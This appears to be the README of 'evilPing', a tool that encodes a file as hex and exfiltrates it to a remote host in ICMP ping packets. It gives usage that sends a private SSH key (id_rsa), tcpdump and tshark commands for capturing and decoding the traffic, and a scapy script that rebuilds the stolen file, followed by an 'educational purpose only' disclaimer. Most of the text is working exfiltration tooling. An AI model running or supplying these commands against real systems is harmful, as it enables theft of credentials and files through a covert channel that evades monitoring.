This tools will convert the data into hexadecimal and send through ICMP packet in each block. if the connection not stable or any packet failed to send, the script will retry sending the failed data first before go to the next block data
Usage: ./evilPing.sh <file> <host>
Example
./evilPing.sh id_rsa 192.168.1.2
sudo python3 evilPingListener.py -s 192.168.56.1 --output passwd
sudo tcpdump -i any -s 0 'icmp' -w evilPing-received.pcap
tshark -r evilPing-received.pcap -T fields -e data -Y "ip.src==192.168.56.1 && icmp.type==8" | tail -n +2 | cut -c 17-48 | xxd -r -p
#!/usr/bin/env python3
from scapy.all import *
src_ip = '192.168.56.1'
packet = rdpcap('evilPing-received.pcap')
data = b''
for pkt in packet[1:]:
if pkt[IP].src == src_ip and pkt[ICMP].type == 8:
data += pkt[Raw].load[16:32]
with open('output', 'wb') as w:
w.write(data)
This tools is for educational purpose only. usage of evilPing for attacking targets without prior mutual consent is illegal and developers assume no liability and are not responsible for any misuse or damage caused by this program.